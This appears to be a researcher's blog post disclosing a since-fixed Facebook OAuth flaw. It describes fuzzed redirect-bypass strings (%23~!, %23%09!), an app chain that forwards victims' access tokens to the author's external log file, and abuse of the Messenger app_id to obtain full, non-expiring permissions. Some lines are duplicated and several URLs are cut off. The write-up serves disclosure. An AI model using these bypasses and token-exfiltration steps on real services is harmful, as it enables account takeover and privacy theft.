How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App "Allow" Interaction)
Hi,
This flaw allowed me to take a full control over any Facebook account,
By exploiting this flaw I could steal unique access tokens that provides me full control over any Facebook account,
By exploiting this flaw I could steal unique access tokens that provides me full control over any Facebook account,
just to clarify there is no need for any installed apps on the victim's account, Even
if the victim never allowed any application in his Facebook account, I
could still be getting full permissions (This bug works on any browser)
To make this exploit work, The victim only need to visit a webpage,
So OAuth is used by Facebook to communicate between Applications and Facebook users, Usally users must allow/accept the application request to access their account before the communication can start.
Any Facebook application might ask for different permissions,
For example:
Diamond Dash,Texas Holdem Poker only have permission to basic information and post on user's wall,
I found a way in to get a full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos,etc..) over the victim account even without any installed apps on the victim's account,
Another
advantage in the flaw I found is that there is no "Expired date" of the
Token like there would be on any other application usage, In my attack
the token never expires unless the victim change his password :),
So, The URL of the OAuth dialog look like this:
https://www.facebook.com/ dialog/oauth/?app_id=YOUR_APP_ ID&next=YOUR_REDIRECT_URL& state=YOUR_STATE_VALUE&scope= COMMA_SEPARATED_LIST_OF_ PERMISSION_NAMES
https://www.facebook.com/
Every application in Facebook have different app_id, For example 'Diamond Dash' will be app_id=2, And 'Texas Holdem Poker' will be app_id=3
The next,redirect_uri parameter (next=,redirect_uri=), only accepts the owner app domain,
For example app_id=2389801228 belongs to 'Texas Holdem Poker' app, So the 'next' parameter will allow only zynga.com domain (i.e next=http://zynga.com),
If the domain is different (nirgoldshlager.com) in the 'next', 'redirect_uri' parameter, Facebook will block this action,
Facebook perform match between your app_id and your next parameter, Facebook also sends the access token via GET request to the owner application after the user allowed it,
Now that we know how Facebook OAuth works, Lets talk about my finding,
I started
to think of my options, what if i can redirect the application OAuth
Request to a different 'NEXT' URL?? First i tried to change the 'next'
parameter to a different domain and they block my action,
Then i tried to change the next parameter to facebook.com domain, and got blocked again with general error message,
I found that if you use a sub-domain for example: xxx.facebook.com, Facebook will allow this action,
But if you try to access folders / files in x.facebook.com (x.facebook.com/xx/x.php), Facebook block you,
I tried to perform this action in the next parameter (next=x.facebook.com/%23!/), And Facebook blocked me again!,
Seems that there is a Reg-ex protection, Cool!,
But wait!,
If we put something like this (https://beta.facebook.com/# xxx!/messages/), the action will not treat at is the same as #! in our client, and will not redirect us to the message screen,
I figured I
had to find a way around it, so I started to fuzz characters between !
and # so I can make any browsers (IE,CHROME,Safari, Firefox..) treat
it like #!,
Now it's time for fuzzing!,
Result:
%23~! (Works on all browsers)
Result:
%23~! (Works on all browsers)
%23%09! (Works on all browsers)
Cool!, this trick works on touch.facebook.com/#%09!/,m. facebook.com/#~!/, or any other Facebook mobile, touch domain),
So Now I'm able to redirect the victim to any Files / Directories in any Facebook Sub-domain,
Then
i created a Facebook application that will redirect the victim to
external website for sending the access_token of the victim to my
"malicious" external website,
For Example: (Zynga Texas Holdem OAuth Bypass):
https://www.facebook.com/
The next parameter will redirect to my Facebook application (touch.facebook.com/apps/testestestte),
And my Facebook application will redirect to files.nirgoldshlager.com domain and save the victim access_token in a log file (files.nirgoldshlager.com/log.txt),
Amazing!, Now I'm able to steal access tokens of any Facebook application,
But wait!!!,
Amazing!, Now I'm able to steal access tokens of any Facebook application,
But wait!!!,
HERE COMES THE REAL DEAL:
To make a successful attack, the victim need to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc..),
And these applications only have a basic permissions, We can always change the scope of the application permission and set a new permission but this method not powerful, Because the victim need to accept the new permissions of the app (https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests),
I wanted something more powerful!,
Something
that will give me full permissions (read inbox, outbox, manage pages,
manage ads,access to private photos, videos, etc.) on the victim's
account without any installed application on the victim and make
Facebook do the Goldshake ;),
So i started thinking
How this can be done?,
So i started thinking
How this can be done?,
What if i will use a different app_id?? app_id of Facebook Messenger for Example,
Does the user need to accept Facebook Messenger app in his Facebook account?,
Does the user need to accept Facebook Messenger app in his Facebook account?,
The answer is no,
There are built-in Applications in Facebook that users never need to accept , And this application have a full control on your account,
Also i found that this access_token never expired in Facebook messenger,
Only after the victim change his password, Then the access_token will be expired, But why the hell the user would change his password?,
PoC (Works on all browsers, No need for installed application on the victim account) :
https://www.facebook.com/
Facebook Security Fixed this bug
Full description of permission for Facebook messenger app:
ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login
Works also on 2 step verification accounts, When it came to access_token , 2 Step verification will fail.
And???,
PoC Video:
<iframe src="http://player.vimeo.com/video/60324292?title=0&byline=0&portrait=0&color=cccccc" width="400" height="300" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>
No comments:
Post a Comment